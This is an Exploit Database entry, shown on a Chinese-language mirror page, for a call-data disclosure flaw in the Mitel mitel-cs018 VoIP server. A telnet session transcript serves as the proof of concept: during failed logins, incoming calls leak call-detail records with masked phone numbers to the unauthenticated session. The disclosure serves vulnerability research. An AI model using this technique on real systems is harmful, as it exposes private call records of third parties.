Mitel mitel-cs018 – Call Data Information Disclosure

• Exploit Database
• 39 阅读

• 作者： Andrea Intilangelo
  日期： 2020-12-02
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49176/

• # Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
  # Date: 2003-07-28
  # Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
  # Vendor Homepage: www.mitel.com
  # Version: mitel-cs018
  # Tested on: Windows, Linux
  
  There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:
  
  Trying 192.168.1.2...
  Connected to 192.168.1.2.
  Escape character is '^]'. 
  Username: mitel-cs018
  Password: 
  ERROR: Invalid Username/Password pair 
  Username:
  Password: 
  Username: ^X^W^E^Q^W
  Password: 
  ERROR: Invalid Username/Password pair 
  Username: Password: 
  ERROR: Invalid Username/Password pair 
  # in this moment a foreign call arrive from outside
  Username: 155 OGIN 14911:11:55D 2
  156 ICIN11:12: 6D 4 0xxxXxxxxx
  157 XFIC 15611:12: 6 1510: 9:47 D 3
  158 ICIN11:12: 6D 3 0xxxXxxxxx
  159 ANSW 14611:12:110: 0: 9 D 4
  160 HDIN 14611:12:21D 4
  162 HREC 14611:12:270: 0: 6 D 4
  163 ABND ?11:12:370: 0:37 D 3 0xxxXxxxxx
  164 ICIN11:12:43D 3 0xxxXxxxxx
  165 EXIC 14611:12:540: 0:47 D 4
  166 ANSW 14611:13: 00: 0:16 D 3
  167 HDIN 14611:13: 6D 3
  169 EXIC 14611:13:13156 0: 0:12 D 3
  171 EXOG 14911:13:460: 1:59 D 2 0xxXxxxxx
  172 XFIC 15611:16:53 1460: 3:40 D 3 
  # where "0xxXxxxxx" are telephone numbers
  A derives table results is:
  SEQ CODEEXT ACC TIME RX TX DURATION LNDIALLED DIGITS COST
  No. No. COD HH:MM:SSFROMTO HH:MM:SS No.
  ___ _____ ____ ____ ____________ ________________ _____________________